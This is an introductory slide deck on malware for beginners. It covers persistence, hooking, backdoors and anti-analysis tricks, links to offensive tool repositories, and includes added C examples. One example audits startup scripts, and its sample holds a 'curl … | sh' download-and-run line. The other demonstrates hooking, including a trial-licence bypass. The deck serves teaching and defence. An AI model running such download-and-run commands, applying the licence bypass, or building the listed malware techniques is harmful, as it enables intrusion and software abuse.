Understand malware
Practical steps for beginners
whoami
Just another programmer: four years' experience
Security engineer: ten years' experience
Antonio Costa – github.com/CoolerVoid
Twitter: @Cooler_freenode
Reference
Malware
Malware is the name for a program designed to mistreat its
users. Viruses are typically malicious, but sometimes commercial
software and software preinstalled on products can also be
malicious, and often are. I'm not even joking, it's a sad fact.
Such software sometimes even sits on the signature whitelist of
some antivirus products. Malware often contains hidden behaviour
which is only activated when properly triggered.
Latest Microsoft threat report (2020)
https://www.microsoft.com/en-us/wdsi/threats
Malware for Linux?
Fake package resources: trojanised .deb, .rpm, .ko (kernel
module)…
Fake sudo
Fake authentication dialogs with Qt/GTK/X11… keyloggers via X11, etc.
It's not impossible!
github.com/GiacomoLaw/Keylogger - keylogger
github.com/CoolerVoid/rootstealer - tool to manipulate X11
github.com/m0nad/Diamorphine - Rootkit for modern kernels
github.com/mthbernardes/Derbie - Tool to generate malicious .deb pkgs
Malware for mobile?
Google and Apple invest a lot in security research, but that's not enough!
As has been shown time after time, malware still gets past marketplace
screening (Google Play, App Store).
Security vulnerabilities are discovered every day, on a constant basis, and if your
device is not patched, you are vulnerable!
Android
Malware abuses Android's Accessibility Service to take over the phone, displaying a
request prompt that lets it add itself to the device administrator list
and become the default messaging app.
Once the takeover is complete, the malware can send an SMS or WhatsApp message
containing a specific text to any number, extract text messages and send them
to the attacker, open links, change the address of its command center, and steal data
such as call logs.
Seen another way: once the takeover is complete, the malware can message your
contacts to spread itself… each sample has a different context!
Warning
The X-files
This is my compendium of strange underground code written as a
scholarly joke: forbidden recipes, fallen functions from the depths...
Windows platforms only.
Keep away from malicious intent; for security study
purposes only!
https://github.com/CoolerVoid/X_files/
Malware in Java...
Everything uses libc. Take the core utilities of Unix-like systems
such as FreeBSD, Linux and Darwin (macOS): commands like
rm, ls, mv, mkdir... these programs use libc, the syscall wrappers
declared in unistd.h, etc.
The X-files
Overview:
Unkillable process
Persistence
On Unix systems you can use rc.local, init scripts… there are other paths too…
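A triage check for the startup paths named above, as an added example that is not code from the talk or from the X_files repository: it scans rc.local-style text for commands launched from world-writable directories or piped straight from a download into a shell. The marker list and the sample rc.local are constructed assumptions, and the heuristic is deliberately simple (a substring match), so treat a hit as something to look at, not as proof.

```c
/* Added example: audit rc.local / init-script text for suspicious launch lines.
 * Heuristic substring markers (assumption, extend to taste). */
#include <stdio.h>
#include <string.h>

static const char *risky_markers[] = {
    "/tmp/", "/dev/shm/", "/var/tmp/",      /* binaries living in world-writable dirs */
    "| sh", "|sh", "| bash", "|bash",       /* download-and-pipe-to-shell */
    "base64 -d",                            /* encoded payload unpacked at boot */
    NULL
};

/* Constructed sample, not taken from any real host. */
static const char *sample_rc_local =
    "#!/bin/sh -e\n"
    "# constructed sample rc.local, not from any real host\n"
    "/usr/sbin/ntpd -g\n"
    "/tmp/.x/update &\n"
    "curl -s http://example.invalid/a | sh\n"
    "# /dev/shm/old-entry (commented out, so ignored)\n"
    "exit 0\n";

/* Walks the text line by line, skipping blanks and '#' comments.
 * Returns the number of flagged lines; stores up to max 1-based line
 * numbers of the flagged lines in out[]. */
static int audit_startup_text(const char *text, int *out, int max) {
    int flagged = 0, lineno = 0;
    const char *p = text;
    while (*p) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        lineno++;
        if (len >= sizeof line) len = sizeof line - 1;   /* truncate overlong lines */
        memcpy(line, p, len);
        line[len] = '\0';
        const char *s = line;
        while (*s == ' ' || *s == '\t') s++;
        if (*s && *s != '#') {
            for (int i = 0; risky_markers[i]; i++) {
                if (strstr(s, risky_markers[i])) {
                    if (flagged < max) out[flagged] = lineno;
                    flagged++;
                    break;                                /* one hit per line */
                }
            }
        }
        if (!nl) break;
        p = nl + 1;
    }
    return flagged;
}

int main(void) {
    int hits[16];
    int n = audit_startup_text(sample_rc_local, hits, 16);
    printf("%d suspicious startup line(s)\n", n);
    for (int i = 0; i < n && i < 16; i++) printf("  line %d\n", hits[i]);
    return 0;
}
```

On a real box you would feed it /etc/rc.local, /etc/init.d/*, cron files and systemd unit ExecStart lines in turn; the point is that persistence hides in the same few places on every Unix-like system, so the audit list stays short.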
Hooking
Operating systems and software may provide the means to easily
insert event hooks at runtime, provided that the process inserting
the hook has enough permission to do so.
Microsoft Windows, for example, lets you insert hooks that can
be used to process or modify system events and application events
for dialogs, scrollbars, menus and other items. It also lets a hook
insert, remove, process or modify keyboard and mouse events. Linux
provides another example: hooks can be used in a similar manner to
process network events within the kernel through Netfilter
( github.com/CoolerVoid/HiddenWall ).
Trial bypass history
Hook the time functions…
GetSystemTime()
GetTimeFormat()
SystemTimeToFileTime()…
If there is an external NTP check, redirect it by pharming the hosts file...
docs.microsoft.com/en-us/windows/win32/sysinfo/time-functions
Antivirus uses hooks
Keylogger function
Screenlogger function
Backdoor resources
Network: socket(), listen(), bind()… libcurl… libnet… raw-socket port knocking
Data transfer: send(), recv(), sendfile() etc...
Command execution: popen(), system(), execv()...
Port knocking
Raw socket shell with AES-256-GCM
using the port knocking technique
github.com/CoolerVoid/ninja_shell
Raw sockets are there to let a program bypass part of the way the
kernel normally handles TCP/IP, so the knock packets are read off the
wire without any listening port being open.
Fake process name
Dangerous docs...
Macros, VBA, exploits...
Turn a normal PDF file into a malicious one.
github.com/3gstudent/Worse-PDF
Turn Office documents into malicious ones.
https://github.com/sevagas/macro_pack
Other resources
Replace a QR code
Change how a barcode renders
Steal cookies
Form grabbing
Steal the browser database (SQLite)
Use a headless browser to bypass the firewall
Use BitLocker to encrypt data… (ransomware)
Use an embedded library to encrypt resources…
Miner bot...
Load a fake driver (rootkit)...
Bootkits…
BIOS...
Protections
To prolong the life of a piece of malware, you frequently see anti-VM
and anti-debugging techniques used to delay the analysis performed by
security experts. The good news is that you have a lot of ways to
mitigate that. With OllyDbg, for example, the OllyExt plugin tries to
defeat anti-debugger checks. Another way, following the hooking
approach, is to hook IsDebuggerPresent() while the debugger runs the
sample so that it always returns zero, bypassing the debug detector.
Keep in mind that IsDebuggerPresent() only reads the BeingDebugged
flag in the PEB; samples often check other things too (NtGlobalFlag,
heap flags, timing, NtQueryInformationProcess), so expect to hook more
than one function.
Bypass malware protections
But you can also turn this around to protect the machine. Hook
IsDebuggerPresent() so that it always returns 1. With this approach
the malware never reaches its trigger: by then it has either frozen or
called exit(), although other behaviours are possible. Malware often
contains hidden behaviour which is only activated when properly
triggered. No trigger, the malware quits. Simple, as long as the sample
actually relies on that one check.
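The hooking idea from the Hooking, Trial bypass and Protections slides above, as one added example that is not code from the talk or from X_files. Windows malware reaches IsDebuggerPresent() and GetSystemTime() through the import address table; here a struct of function pointers stands in for that table so the redirection can be shown on Linux, where the stand-in for IsDebuggerPresent() reads TracerPid from /proc/self/status (assumption: Linux procfs). The same swap is used three ways: freezing the clock so a trial never expires, forcing "no debugger" for the analyst, and forcing "debugger present" for the defender.

```c
/* Added example: function-pointer "import table" with swappable hooks. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* Parses the "TracerPid:\t<pid>" line of /proc/self/status text.
 * Returns the pid (0 = not traced), or -1 if the field is missing. */
static int tracerpid_from_status(const char *status_text) {
    const char *p = strstr(status_text, "TracerPid:");
    if (!p) return -1;
    p += strlen("TracerPid:");
    while (*p == ' ' || *p == '\t') p++;
    return atoi(p);
}

/* Linux stand-in for IsDebuggerPresent(): non-zero TracerPid = ptrace attached. */
static int real_is_debugger_present(void) {
    char buf[4096];
    FILE *f = fopen("/proc/self/status", "r");
    if (!f) return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return tracerpid_from_status(buf) > 0;
}

static time_t real_now(void) { return time(NULL); }

/* The "IAT": every sensitive call goes through this table, so replacing
 * a slot is the equivalent of patching the import entry. */
struct api_table {
    int    (*is_debugger_present)(void);
    time_t (*now)(void);
};
static struct api_table api = { real_is_debugger_present, real_now };

/* Trial check as on the "Trial bypass" slide: expired after trial_days. */
static int trial_expired(time_t installed_at, int trial_days) {
    return api.now() - installed_at > (time_t)trial_days * 86400;
}

/* Malware-style trigger: only run the payload when no debugger is seen. */
static int payload_should_run(void) {
    return !api.is_debugger_present();
}

/* Replacement functions an analyst or defender can install. */
static int    hooked_dbg_absent(void)  { return 0; }   /* analyst: hide the debugger */
static int    hooked_dbg_present(void) { return 1; }   /* defender: fake a debugger */
static time_t g_frozen = 0;                            /* frozen clock value */
static time_t hooked_frozen_now(void)  { return g_frozen; }

static void hook_debugger(int (*fn)(void))   { api.is_debugger_present = fn; }
static void hook_clock(time_t (*fn)(void))   { api.now = fn; }
static void unhook_all(void) {
    api.is_debugger_present = real_is_debugger_present;
    api.now = real_now;
}

int main(void) {
    time_t installed = 1600000000;   /* constructed install timestamp (Sept 2020) */
    printf("trial expired, real clock:   %d\n", trial_expired(installed, 30));
    g_frozen = installed + 1;
    hook_clock(hooked_frozen_now);
    printf("trial expired, frozen clock: %d\n", trial_expired(installed, 30));
    hook_debugger(hooked_dbg_present);
    printf("payload runs with forced 'debugger present': %d\n", payload_should_run());
    hook_debugger(hooked_dbg_absent);
    printf("payload runs with forced 'no debugger':      %d\n", payload_should_run());
    unhook_all();
    return 0;
}
```

A real Windows hook achieves the slot swap by overwriting the IAT entry or patching the function prologue, and a Linux preload library does it with LD_PRELOAD and dlsym(RTLD_NEXT, ...); the control flow the malware sees is the same as in this table.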
The enemy
Do you know your enemy?
Install VMware Tools
or the VirtualBox Guest Additions
to mimic a VM
on your desktop…
Manually unpack and migrate the DLLs, binaries, etc.
Trigger Anti-VM resources
Inspired by the PowerShell script Fake Sandbox Processes (FSP),
this script lets you create various artifacts on a bare-metal
Windows computer in an attempt to trick malware that looks for
VM or analysis tools.
github.com/NavyTitanium/Fake-Sandbox-Artifacts
Problems with sandbox artifacts
Banking desktop applications use anti-debugger and anti-VM
checks… these can shut down your bank's desktop application…
Games (the Steam client, the Origin client) have anti-cheat engines
that close the application when they detect VM or debugger
artifacts...
Warning
theZoo
“theZoo is a project created to make the possibility of malware
analysis open and available to the public. Since we have found out
that almost all versions of malware are very hard to come by in a
way which will allow analysis, we have decided to gather all of them
for you in an accessible and safe way. theZoo was born by Yuval tisf
Nativ and is now maintained by Shahak Shalev.”.
https://github.com/ytisf/theZoo
Veil
“Veil is a tool designed to generate metasploit payloads that bypass
common anti-virus solutions”.
github.com/Veil-Framework/Veil
al-khaser
“Public malware techniques used in the wild: Virtual Machine,
Emulation, Debuggers, Sandbox detection. ”.
https://github.com/LordNoteworthy/al-khaser
Other resources
https://github.com/wtsxDev/reverse-engineering
github.com/beerisgood/Windows10_Hardening
github.com/LOLBAS-Project/LOLBAS
github.com/mentebinaria (Brazilian cool stuff)
Other paths
Doubts?
Contact:
coolerlair [at] gmail [dot] com
Thank you !